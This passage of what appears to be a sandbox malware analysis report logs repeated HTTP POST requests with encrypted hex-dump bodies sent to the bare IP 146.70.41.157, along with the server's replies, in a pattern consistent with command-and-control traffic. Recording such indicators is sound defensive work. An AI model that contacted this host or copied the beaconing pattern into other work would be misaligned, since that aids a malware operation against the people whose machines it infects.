                                                                                                    Data Raw: c9 65 f1 81 0d f2 a7 28 b3 ee d5 44 c4 39 24 2e b1 3c cf 7e e6 19 b8 39 84 77 ca bc 07 a6 d7 7a f6 69 cd 2b 8d 5a f5 83 e7 b6 ee 61 34 b6 11 3b 82 c5 7f 7c 03 e8 71 4a d7 57 cd c8 e4 5f 73 92 09 83 c3 e5 6f 11 19 51 fa 25 5a 59 06 cf 40 a2 b4 d1 35 af 1a b8 7d 8e 98 1c 8f f4 00 b5 f0 15 51 c7 86 d7 32 95 6c a8 91 74 f6 7f 6d 53 30 3a ef dc 1f 06 2c 05 21 49 ad d5 cb 21 a6 a6 be 19 3e 1b 72 46 03 36 a8 36 30 19 f1 e3 0f 3e 91 96 37 fd 88 3d fd 41 29 c6 5c 17 2e 85 a6 8b b1 b9 6f 4b e5 43 32 5e 35 75 86 87 11 62 dd
                                                                                                    Data Ascii: e(D9$.<~9wzi+Za4;|qJW_soQ%ZY@5}Q2ltmS0:,!I!>rF660>7=A)\.oKC2^5ub
                                                                                                    Oct 4, 2021 21:29:51.527610064 CEST2770OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 343
                                                                                                    Oct 4, 2021 21:29:51.665740013 CEST2770OUTData Raw: 09 fa e0 ea 26 f7 17 02 f5 24 02 f9 a1 51 7f 97 61 b7 26 01 a0 c9 60 4e 9f e0 44 30 b6 c1 81 5f 52 9e cc c0 c4 88 1c 32 34 0a 95 53 ba 7d 8b 51 bb 66 47 10 34 7b 95 3e 9b 92 4b 44 b4 e6 4a 34 a2 a2 a8 03 83 be d2 d8 9c f3 cc 97 34 0d 92 23 56 f1
                                                                                                    Data Ascii: &$Qa&`ND0_R24S}QfG4{>KDJ44#VtPzq,&2=|Lbns?9u85aA^!Aq-?PHV\Dyj0'q"IL)o=}@5Fq!C:.st'}G/V`ic$Yf7jklm]\$I?A, BZt
                                                                                                    Oct 4, 2021 21:29:52.333029985 CEST2772INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 330
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 9f 14 3d c5 d0 d6 78 71 34 9a c0 81 0e ee e8 b3 0f 6b 5b 6b 98 e5 6b de 1a b0 81 1c 5b 25 84 f3 34 90 b1 48 d3 6f 95 a4 d5 c7 ff da e9 83 43 35 77 43 fa 5b b7 1f ce 66 04 8c 3f 3a 8c 0a f7 4c 83 f4 bc aa b3 70 32 6f 99 8c c8 10 5b cc 94 18 f8 11 b9 36 ab 96 40 9a 36 82 73 16 b0 14 28 93 7c 09 f9 81 60 35 f5 01 3a 24 48 7d 2b bb 0d 25 1f 7e 6b a9 2a 37 ef 35 b8 72 7b 58 ef 1d 38 72 d3 71 f6 34 65 12 3c 37 b4 e8 df eb 2a f8 b9 07 2f fe 55 e8 6f 95 87 22 e6 ea 88 43 66 d2 63 c1 34 59 84 d2 32 ab a5 79 51 b0 21 2c 25 2e 8b 2d 36 89 2e 58 92 5c 4a cf bd a6 56 07 63 2c b5 59 d0 66 20 0e 35 be 46 3c 02 cd 07 db a9 ff 33 58 69 91 61 70 1c 06 2e a3 eb 6a 29 03 82 cc 0e 7a 0d c3 b7 ba 6e 6e fb 97 55 fd be a7 8d 75 76 7c 7e ca 30 33 25 7c 09 a9 62 00 99 c5 3a a4 24 61 5c 6d 0d e5 19 aa c4 cc 76 89 ea d2 a6 bf 5c a1 bb ba fc 3b 7f 7f 40 84 bc be db 70 84 65 40 c4 06 37 77 a2 9d 4f 87 ac c1 af 71 af be 67 ab 33 34 ba 0a 8e 67 88 f7 0d 98 5e ee db 24 3e 1c 97 03 aa a8 43 1d fc d1 7e 44 dd
                                                                                                    Data Ascii: =xq4k[kk[%4HoC5wC[f?:Lp2o[6@6s(|`5:$H}+%~k*75r{X8rq4e<7*/Uo"Cfc4Y2yQ!,%.-6.X\JVc,Yf 5F<3Xiap.j)znnUuv|~03%|b:$a\mv\;@pe@7wOqg34g^$>C~D
                                                                                                    Oct 4, 2021 21:29:52.439862967 CEST2772OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 745
                                                                                                    Oct 4, 2021 21:29:53.193428993 CEST2774INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 137
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: a4 72 a3 95 54 aa c8 04 83 07 3b c0 fd f9 0f 16 a3 ef 68 60 55 69 6c 01 3f 34 a2 7a 7d 7b 88 53 f2 22 cf 93 0b d0 ec 71 50 fc f3 83 2f bc 58 f1 66 96 a4 9e b4 b5 34 aa 00 89 7d 67 cc 7a 38 7e 9b b6 c2 3a 8b 30 6e 74 45 60 fe 74 7d 93 ac 05 69 4d 82 05 38 a0 79 bb 86 01 71 0c c1 98 90 5c cb b7 d8 7e bb 94 9f 69 f3 36 f4 89 8d 4b 4b 28 ad c9 80 2e 9e 82 ce f6 a3 e2 a9 f1 68 32 5e 94 38 13 a5 2d 37 cd 94 18 15
                                                                                                    Data Ascii: rT;h`Uil?4z}{S"qP/Xf4}gz8~:0ntE`t}iM8yq\~i6KK(.h2^8-7
                                                                                                    Oct 4, 2021 21:29:53.299407005 CEST2775OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 555
                                                                                                    Oct 4, 2021 21:29:54.075418949 CEST2777INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 315
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 32 1d 4b 83 8e ae 61 01 59 f4 57 84 94 a9 97 30 f2 70 b0 5c 5b 6a f4 0c cf 32 c3 7a 9e de dc 1b 0d 35 81 bd ac bf 02 ec b7 32 15 b5 17 42 77 89 d5 24 02 d5 74 7f c5 4e d5 49 12 7e 7b 69 dd ce 53 c6 86 22 88 5d af 4a cf d7 34 8b e7 41 f8 7d 2e 25 02 ca cb 1d aa fc 36 78 6f 5d 99 53 77 04 14 12 e2 43 9d ee 98 83 c9 9c 78 dd 64 a3 dc 38 a1 f6 d8 87 a5 0b 43 5f d0 d7 b5 2d 46 60 ec b8 12 20 e3 6a 78 f6 09 ee db 76 d0 c5 70 c5 da c9 0e c0 d9 42 74 8a 52 04 20 c9 e2 b0 e5 f3 ae 0c 34 8e 66 c9 90 db 7d e2 c3 7d 06 de b8 90 e5 38 70 dd 01 0d 62 f7 73 f5 7b ae 13 26 e6 e9 37 13 01 91 c9 2b fe 73 d6 f8 21 96 e2 14 5c 2a 71 05 47 28 31 5d bd 54 9e e3 ec ce 6b 4b 3c 1b 3e 6c 91 2b 5c d6 95 72 89 19 e6 43 00 2f 94 ad 34 40 70 a3 b6 35 96 aa f6 e8 48 69 43 83 c2 76 ab a5 92 7d 63 96 ae 02 dc 75 1d 13 52 05 7a 08 cf 0c eb 00 c6 87 25 99 c9 9d 8d 81 d5 60 e0 26 56 a6 a0 42 c2 98 23 62 a1 90 b3 48 53 10 41 fc 86 89 2b bf 79 76 bf 8b d4 33 38 d2 77
                                                                                                    Data Ascii: 2KaYW0p\[j2z52Bw$tNI~{iS"]J4A}.%6xo]SwCxd8C_-F` jxvpBtR 4f}}8pbs{&7+s!\*qG(1]TkK<>l+\rC/4@p5HiCv}cuRz%`&VB#bHSA+yv38w
                                                                                                    Oct 4, 2021 21:29:54.189908981 CEST2777OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 495
                                                                                                    Oct 4, 2021 21:29:54.931194067 CEST2779INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 82
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: dc 00 4c fe 43 d5 73 8e 74 76 ad 12 ea d9 58 7f 1f 8c 00 6a ba 29 f1 c5 3e 3b 1c c6 8e 49 d2 60 34 10 02 0d 83 e6 18 ba b7 92 b9 8b 24 44 34 f6 ac 7d bb ea 1a 68 08 f3 8d 59 38 54 f2 e5 c6 34 0b 4d 22 c2 5a 7a 0b b6 59 1c fd a6 2c dc 7f 6f 7c d0
                                                                                                    Data Ascii: LCstvXj)>;I`4$D4}hY8T4M"ZzY,o|
                                                                                                    Oct 4, 2021 21:29:55.033898115 CEST2779OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 326
                                                                                                    Oct 4, 2021 21:29:55.775495052 CEST2781INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 273
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 82 e1 2e 31 e4 3b 8c 03 a8 f6 c0 e2 d6 81 76 13 a4 64 96 45 82 64 d4 5b 5c ac e8 30 8c ff 4c 7e ec e5 ec ca ff 1c 33 e4 fc 66 35 cf 3f d8 ba 4f cc 7a 5f 66 5e fc 93 e5 a4 23 41 c9 4d 7f f9 30 89 ea 2b 1b 72 e3 69 3e 99 65 c0 f2 6b 23 9b 71 ce ef 29 fb 71 ec 31 f9 27 c3 ad 87 c2 81 f0 67 3a 78 98 bf f4 31 30 1d 2b d7 5c 3a 29 d5 86 bc 47 5b ca 94 2f 7d 55 47 e1 5a f3 2c 49 f9 cd 43 a2 0f b3 ca 46 e8 e7 55 a0 c7 9c 0d eb ec 60 3e 84 6b 98 5b e8 28 e6 19 70 ec 6f 02 6a 83 aa 7d cf 96 56 be b4 3e b6 e5 d0 15 fd 44 1b d7 7f 2a ad e4 a4 66 d2 92 3e da 2a e9 cf 36 57 2c 59 94 00 8f 16 09 38 ed 38 82 f1 8a ac 36 48 1d fe 27 2e e2 e1 5f 78 0a 1c ef 6b e6 c9 f6 3d 2b 4a 3e 4b 63 f1 04 2f a4 d5 8f bc 26 ad 9f 6a e2 7e 2a 85 dc 3a a6 6b 5c db e8 ba 7f db 05 4b 6f a9 36 0b 3d b7 45 f5 4f e6 1d 10 0a 5f 40 b6 16 65 47 1c
                                                                                                    Data Ascii: .1;vdEd[\0L~3f5?Oz_f^#AM0+ri>ek#q)q1'g:x10+\:)G[/}UGZ,ICFU`>k[(poj}V>D*f>*6W,Y886H'._xk=+J>Kc/&j~*:k\Ko6=EO_@eG
                                                                                                    Oct 4, 2021 21:29:56.138819933 CEST2782OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 545
                                                                                                    Oct 4, 2021 21:29:56.919857025 CEST2784INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 303
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: df 4e b2 a1 64 f9 87 d3 e8 a3 d0 7f 12 e2 78 bb c8 b7 74 9c aa 77 d9 be eb 13 1c 9b b9 e5 f2 61 a0 74 9f 1b 42 ed 32 93 c3 d3 fb e4 cb 86 7b 7d 4a f5 27 63 11 b9 3b 30 c8 79 f0 ff 16 4c d2 b3 0f fa 14 34 ae f1 b3 cb 44 3c 6d 7c 47 95 e7 75 10 1a 8b 66 80 b2 d4 6b 10 74 93 68 bf c6 e4 2a 0b 6d e7 da ef 87 0f 38 91 36 d5 2c 47 58 35 3d 0f 32 03 ae 1e bd 8f 05 7c 79 a5 4e 0c 7c 30 cd b3 a6 fd 1c f8 e0 f7 b5 02 8e 4a 35 3f a0 87 b6 60 da 57 aa f1 ea 0b 56 66 e7 3c 8a 8a 3e 57 d0 4f 6b 23 41 a6 ec b6 39 47 1d a0 5a 54 a8 3f 9c 5b 59 56 ed b6 17 a9 29 40 33 3d 3c 3e b7 34 fc 7e f1 a7 ed 33 f6 13 94 ba e0 b5 a4 71 8a eb 87 56 ba b1 b5 10 6f 7c 13 6f f5 71 21 61 cc 00 31 00 6e ac 78 07 6e b9 b8 b7 f8 7d 28 a5 e8 bc 7b 03 a4 fa bc 59 80 fa a2 62 9e da e6 02 8e 88 ff 77 38 26 13 fd 74 b9 d0 65 7c cf 1e 9d 9b 46 1f af 7f 55 b7 19 70 4e 27 c5 5d e4 a1 4a 53 e1 9a 0d 4e 73 6e 99 74 7c 1b fd 5b 98 fd af 5f ac
                                                                                                    Data Ascii: NdxtwatB2{}J'c;0yL4D<m|Gufkth*m86,GX5=2|yN|0J5?`WVf<>WOk#A9GZT?[YV)@3=<>4~3qVo|oq!a1nxn}({Ybw8&te|FUpN']JSNsnt|[_
                                                                                                    Oct 4, 2021 21:29:57.060986042 CEST2784OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 504
                                                                                                    Oct 4, 2021 21:29:57.819812059 CEST2786INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 320
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: db f6 99 42 b0 72 fc fb c1 f7 4b f7 2b 45 b0 af 18 aa c3 36 7b ed 77 e4 ee 08 f1 e5 be cd 42 86 4d 86 91 75 7f ce bb f4 d7 a5 8d c3 0c 85 91 ef 7e d0 d1 5e 96 28 69 66 33 79 e2 3d 61 a2 29 f1 0e 1b 1f 05 d0 8f 77 17 08 7d bd 0a 01 fa 0e cc f6 e0 71 e5 5e 3c 64 b9 cf 5c d2 14 91 2d f7 f7 ce e6 dd a8 05 cd 6a cd 92 f7 9b a9 ae f5 13 19 b8 96 db 12 c5 c2 d4 bb 43 d5 bf d4 42 e8 c6 0b a8 48 13 37 d5 e3 b5 77 29 53 74 b7 6c f7 8b b9 3e 1b c6 65 52 b7 8b 7f 42 0a 55 6e 74 ca ff 73 41 df ce 80 46 8e 7b a1 f2 2d d1 cc cd 96 2e ae c2 70 85 46 51 62 de 22 27 59 27 b6 1a d6 1f 37 17 26 32 cd 70 df 1d f4 dc a2 60 b3 95 51 98 51 5b 0e 12 74 b8 bc d1 8e 14 a4 c8 77 24 b9 21 1c ac b3 f5 89 88 c3 60 71 73 2b 9b 60 73 39 a0 00 04 6c be 89 20 38 c5 ac 60 3d 76 8e 93 43 5c 62 3c d4 88 91 ba ce 76 78 7e 91 f6 20 cd 32 d1 5f f0 2a b9 1e 18 15 9e c4 4e 23 2a 76 bd 47 18 33 54 c0 bc f7 9f 94 eb 24 cb f9 ed 2e a3 68 9d 37 eb c8 c7 8e 3a a5 47 31 2e 18 0e 6b 0c 0d 69 06
                                                                                                    Data Ascii: BrK+E6{wBMu~^(if3y=a)w}q^<d\-jCBH7w)Stl>eRBUntsAF{-.pFQb"'Y'7&2p`QQ[tw$!`qs+`s9l 8`=vC\b<vx~ 2_*N#*vG3T$.h7:G1.ki
                                                                                                    Oct 4, 2021 21:29:57.924762964 CEST2786OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 634
                                                                                                    Oct 4, 2021 21:29:58.707637072 CEST2789INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 93
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 9c a2 51 f2 4c 6b a4 81 52 ae fc 64 00 4f 97 aa df 24 5d 1b ea b5 f4 4e 23 3d 4e 61 50 ee 3b 91 97 3e 61 ed 87 6d 49 cf 33 7b 25 d4 50 1e 38 69 62 7f b3 2a 7b 81 7e 59 bf b0 60 bf 0c a0 07 c4 13 93 e5 2f 2d 4e e8 e4 e0 77 23 1f 5b 2a 56 c8 03 d9 85 9c bd fa 31 17 2d 6c 10 2e 40
                                                                                                    Data Ascii: QLkRdO$]N#=NaP;>amI3{%P8ib*{~Y`/-Nw#[*V1-l.@
                                                                                                    Oct 4, 2021 21:29:58.815407991 CEST2789OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 694
                                                                                                    Oct 4, 2021 21:29:59.537951946 CEST2792INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 262
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: b8 2b cf c8 30 e3 22 94 85 96 54 e5 1e 59 a3 15 81 49 3e 56 3c ca c9 63 1e 6c d4 b7 a3 7b 6a 5a c0 c1 03 2b 77 57 b7 ae 6b 27 4c a4 6d 1b dd 48 e1 33 cf ab 1b be 02 a7 2e 60 05 87 eb 02 3f 7e 2e 25 03 3a ca b2 c5 d0 c9 6e 28 14 05 9e a6 c5 3c 1b 2d 28 08 fe 8d 6d c1 35 89 03 05 58 99 d4 81 ec 4d fc 88 2b 58 dc c5 62 aa 07 06 4c 43 43 8f fb dd c0 4f 95 d1 41 10 d3 94 47 fd 14 05 0d fa 6e f2 e2 40 77 86 ca 95 46 ba cc c5 a8 99 ce 85 88 71 b5 6f 7f 95 17 6e 2c 79 da 9b aa 96 d7 4c 8f 0f 8a f4 46 40 73 e5 73 ab 7e cf 76 29 c6 0b 33 7b 55 91 00 65 4b 09 76 d4 d4 ef 19 c1 94 c8 39 00 79 0c 6b 23 4b ea 68 e6 3a 2d bf 30 0a 98 a3 0f 3b ae 63 ac 86 25 d4 d1 26 6c 62 10 1f c5 63 72 72 9d fc a5 bf 2f a1 47 41 b3 d0 65 33 82 f1 5e e6 7e 61 ab b8 f1 b3 e8 8c a7 21 43 4d 26 91 01 bc e9 c4
                                                                                                    Data Ascii: +0"TYI>V<cl{jZ+wWk'LmH3.`?~.%:n(<-(m5XM+XbLCCOAGn@wFqon,yLF@ss~v)3{UeKv9yk#Kh:-0;c%&lbcrr/GAe3^~a!CM&
                                                                                                    Oct 4, 2021 21:29:59.659332991 CEST2792OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 318
                                                                                                    Oct 4, 2021 21:30:00.408020973 CEST2793INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 181
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 82 0d 19 c5 af 7b ba 93 50 65 5d 07 e0 4a 24 12 7d c4 dc f1 89 37 ba 5e c7 90 e6 9c a3 6b 1c d2 04 35 a6 cf cb e6 a2 c7 4e 8b ea cf 88 6e ae 20 a9 ea 85 06 30 c2 40 8a 02 13 cf 32 95 31 83 f3 5f a9 48 37 2c 95 1e 03 82 bb 0b 41 6d b7 45 77 0d 5a b5 03 fd 6a 27 91 50 d9 b3 68 8d d1 d4 ba 20 64 1d 6f 00 96 9f 49 5c cb 2c 1f fb b9 da d9 97 6c d7 46 fb 67 af d4 4a f8 50 b1 19 82 ec 96 98 b6 b9 bd d1 c7 f1 52 54 d5 7e 3c 3d 7d f4 e4 20 74 a2 f1 93 6e a4 55 39 e1 5e 35 8c ae c1 a8 0e 2b b5 b8 d6 cb db 8b 50 d6 86 ec 6a fa 3f 64 53 80 cb c5 06
                                                                                                    Data Ascii: {Pe]J$}7^k5Nn 0@21_H7,AmEwZj'Ph doI\,lFgJPRT~<=} tnU9^5+Pj?dS
                                                                                                    Oct 4, 2021 21:30:00.615649939 CEST2794OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 278
                                                                                                    Oct 4, 2021 21:30:01.379547119 CEST2795INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 246
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 58 31 03 92 1d 24 c5 9a 2c e2 fd d0 58 91 bb 28 18 9c 91 e7 1b fd c0 31 b0 50 85 70 8c 2e 5d 1c ea 1a 74 60 66 42 b4 e8 9d b5 eb 8c 82 47 77 60 a7 f8 1f 1e b9 e1 5c 4f be 15 d4 4d 0c 2b 4d fa f4 f3 b1 eb d5 7c ca 7f 46 e8 45 03 1b c6 9d 84 46 11 de 9d 97 df d2 1b b7 f1 c6 ab e3 ab 45 7e 5b 59 5f 54 8c d1 a3 0f 9d a4 0b f6 1d 11 cf 63 2d 4e 8a 03 77 ae 3d 21 e5 f3 21 98 71 a9 9a d2 84 b6 56 ec 96 8a 23 af 3e 52 36 8c 68 e8 41 bc 58 ee 02 dc de 77 d9 91 37 50 ce 8e 1f cb 5b 62 7a ca 6a 7e 4b 00 14 b1 7b 94 13 2a 12 f5 82 7d ac 4d 6f bc eb eb 08 b1 d2 26 cf 56 01 f7 16 07 30 cd 5d 92 64 41 4c 8c 22 43 5e 18 c5 a7 e9 97 2d 83 01 e4 dc 8c 38 8a 3d d3 38 72 3d 39 14 d9 36 ee 4a 1d 0e f9 a4 97 cf 4a 1b 17 f1 5c a2 2d 5c 9b c7 86 f6 f8
                                                                                                    Data Ascii: X1$,X(1Pp.]t`fBGw`\OM+M|FEFE~[Y_Tc-Nw=!!qV#>R6hAXw7P[bzj~K{*}Mo&V0]dAL"C^-8=8r=96JJ\-\
                                                                                                    Oct 4, 2021 21:30:01.487452030 CEST2796OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 393
                                                                                                    Oct 4, 2021 21:30:02.249147892 CEST2798INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 304
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: ba 8d 1f 17 04 d9 18 3b 23 86 f2 e1 17 20 bb 26 07 22 43 47 12 4d d2 8d bb 77 ab d6 03 4c dc 37 57 8d e5 7e 5f a8 b0 29 0c af d2 da 6b 22 6a 5a 39 53 25 c1 f8 37 0c e2 12 3d 35 4e e8 64 e7 c8 d6 9d d2 2a 4f b9 f6 a4 9e 11 47 b8 cb d9 f0 9f 8f f8 f4 f3 f0 af 48 73 0b 45 5c cd 34 6d f1 64 c8 fa f9 93 59 7c e2 b7 96 79 4c 52 a3 18 30 26 33 3d 92 11 d1 8e e3 6f 20 e4 38 b6 23 3a ac ca 10 63 89 2c 5c 3f 8c 98 c9 ab b5 2e 21 c6 8f bf c0 ce 08 ca f7 e3 67 94 c2 e1 0c 25 3c b5 44 5a 11 52 51 d2 c7 bd 71 f8 92 48 c7 61 36 a3 c5 b9 1b 82 1b f8 12 c6 66 34 97 68 e1 be ba 78 15 f7 f0 33 14 bd 39 08 4a 02 a2 20 32 df 2d fe 32 74 5c ea 74 e6 d6 23 89 27 5a 07 6e 06 e9 03 72 00 1f dc 73 52 50 cc 98 bc 08 5b fb a3 f3 08 54 0c 6c 71 ed 7f f7 a2 93 26 ab c2 4f 0c 2a 00 ec 4c d8 f3 e2 79 ec 20 39 8d dd fb 4e 81 6e 0a f1 16 5b e4 5e 86 46 fa cb 43 c3 5b 6d e3 b6 8f e6 9e 28 33 4c 0a 3b 93 16 b2 2d ba 2f 14 80 bc d2 88
                                                                                                    Data Ascii: ;# &"CGMwL7W~_)k"jZ9S%7=5Nd*OGHsE\4mdY|yLR0&3=o 8#:c,\?.!g%<DZRQqHa6f4hx39J 2-2t\t#'ZnrsRP[Tlq&O*Ly 9Nn[^FC[m(3L;-/
                                                                                                    Oct 4, 2021 21:30:02.364272118 CEST2798OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 360
                                                                                                    Oct 4, 2021 21:30:03.162836075 CEST2800INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 241
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 4f de a9 a2 ca 78 1c d5 4c 7b f6 51 e9 8e fc 89 de 2d a6 f5 a9 d9 10 22 35 b6 cc 6f b0 5d 42 f1 04 8c 45 56 21 a6 d9 a9 bb 79 58 e6 de 58 f7 6f ae 88 e6 19 f5 ea 63 dd 27 a5 f2 28 69 39 bf 5e a5 ff 13 8a 3c 3a 40 32 0a 6b 7d 46 ac 39 8c 16 bf 66 cc e4 b5 d9 86 fd 52 c9 9b 63 01 e5 9f 1d 76 fc f7 86 89 a3 46 eb e2 27 b3 f4 a2 02 f2 54 57 cc d2 14 ea b9 3d 3e a1 66 cb 13 86 58 9b eb ee a9 9a 52 e0 4e ab 1b 61 e4 48 5e 83 41 80 a2 92 e8 a1 5e 41 13 cc b3 13 11 21 e9 17 75 ba 79 00 3c ef ed 78 25 27 eb 57 79 ba a4 08 be b4 0e f4 df 32 82 2c 9d bb 1c 27 22 b9 cf 4b 83 0b 96 4d a3 ee 99 27 44 4b 2c b7 f1 ba bd 31 af 4a 8f e2 74 5a 78 19 d7 7a c8 67 a4 ac bd 27 64 8f a0 a4 e7 7d 7f 19 5f 2b f5 33 82 8d f6 3d 33 f3 57 10
                                                                                                    Data Ascii: OxL{Q-"5o]BEV!yXXoc'(i9^<:@2k}F9fRcvF'TW=>fXRNaH^A^A!uy<x%'Wy2,'"KM'DK,1JtZxzg'd}_+3=3W
                                                                                                    Oct 4, 2021 21:30:03.268831015 CEST2800OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 277
                                                                                                    Oct 4, 2021 21:30:03.999563932 CEST2802INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 210
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 04 04 2c 0c 62 60 8b 99 d3 2b 31 62 e8 40 7a ed b4 26 05 9d e0 88 a4 3f 92 b9 c9 27 b9 39 a2 56 ba ce 40 3e 33 20 da 8b ae 7f c2 95 18 e7 58 df 7d 15 a7 73 6b 8d c8 e2 44 16 de 11 fd c7 2b 23 67 80 6b 8e 5d 99 ee 03 18 8e 73 81 6a 58 0a 44 78 99 8b ae 82 16 2a 07 d1 2b 6b 5a 4c 60 6c 80 4a 5c 81 67 61 2b ca ee f1 6d fe 40 e9 83 63 be ae 3d 21 9d d9 df 7a 20 02 a8 b0 a2 d2 fd 70 4c 04 00 83 9e f9 ee 8f 8a 43 16 3f 1b 3a 97 cd ac 75 16 ac 93 2b 76 32 58 bd c2 cc 2c 14 49 91 78 b2 16 07 6d b3 50 25 c9 f0 d6 2d 3a 78 38 d9 83 f0 d4 62 28 f5 39 1b 5f a0 14 67 85 91 c0 dd 14 7a 49 18 fb 91 72 cb 95 a7 d6 de 05 b0 eb 73 e7 dd 49
                                                                                                    Data Ascii: ,b`+1b@z&?'9V@>3 X}skD+#gk]sjXDx*+kZL`lJ\ga+m@c=!z pLC?:u+v2X,IxmP%-:x8b(9_gzIrsI
                                                                                                    Oct 4, 2021 21:30:04.112703085 CEST2802OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 429
                                                                                                    Oct 4, 2021 21:30:04.880990982 CEST2804INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 279
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: dd e7 56 14 ec d5 2d 35 7e eb 6a ec 95 50 95 c2 ae 5a b4 67 ad f2 35 99 15 58 6f 25 a6 ce fc b4 9a 2c 33 30 83 f7 9f b4 bb 53 d6 fe cf ae 83 75 8a e0 ab ae 15 8f 80 43 21 5c 53 de 31 20 16 2a 6d a7 52 d2 da 0a b4 b5 47 a9 22 ac a7 43 ca e1 50 78 1c 2e 0b cf 54 b9 c3 85 96 4c ca 6c b5 12 83 ee df 68 53 4e 9e 8f 19 8d 02 bb b5 9d 02 21 03 cd 69 6d 26 fd 14 ae 60 21 fa d9 53 a5 7f 87 3a 46 e9 d4 db 8e d4 b4 a1 cc 48 0c 97 20 3d 86 c7 68 e4 2d 58 cf b5 a4 9d 92 96 ba 59 15 cd 6a 19 c0 e6 b6 e9 61 93 30 10 f8 48 35 43 af a8 6f ea 83 a1 fa b8 21 22 b4 9e 69 a1 3d 91 62 7a 54 78 f1 44 38 f6 24 00 eb 2c 58 0a 9a ed 2b 9d 79 4e b2 42 72 58 57 e4 87 e2 93 8b 3b c8 a2 ea fe 09 12 b7 00 ab 3d 9d 2d 8c 83 2a d7 4a 36 cc 45 3c e8 10 0c 8a f3 ca 79 65 b1 03 57 49 d3 ce 83 9a 6f 74 17 60 cb 35 21 6c 44 38 4a 06 c9 da 65 6b 5f 60 0d 7b cb 61
                                                                                                    Data Ascii: V-5~jPZg5Xo%,30SuC!\S1 *mRG"CPx.TLlhSN!im&`!S:FH =h-XYja0H5Co!"i=bzTxD8$,X+yNBrXW;=-*J6E<yeWIot`5!lD8Jek_`{a
                                                                                                    Oct 4, 2021 21:30:04.987998009 CEST2805OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 272
                                                                                                    Oct 4, 2021 21:30:05.749222040 CEST2806INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 118
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 71 58 ed bd 9c a8 25 51 45 24 28 b7 26 2c 49 d3 da 4d 1a 01 a6 e7 bf 17 5d 34 1b 42 4f 51 45 63 e7 6c db d2 fd 00 6d 41 34 08 bc e4 cc 7c 10 3c 19 bf ca e8 e1 ef b1 58 bf 2c 13 da b5 f3 34 52 fb 5a a1 db e7 5e a4 10 b2 77 45 39 9a 2c c2 eb 8c c3 12 85 46 05 6a 4c 23 d7 76 0e 50 2d aa 4f 5b ed 3a 8d 2e 7a df 70 81 a3 d9 66 80 6e b9 3c 00 60 5c c3 41 92
                                                                                                    Data Ascii: qX%QE$(&,IM]4BOQEclmA4|<X,4RZ^wE9,FjL#vP-O[:.zpfn<`\A
                                                                                                    Oct 4, 2021 21:30:05.862673044 CEST2806OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 385
                                                                                                    Oct 4, 2021 21:30:06.603471994 CEST2808INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 92
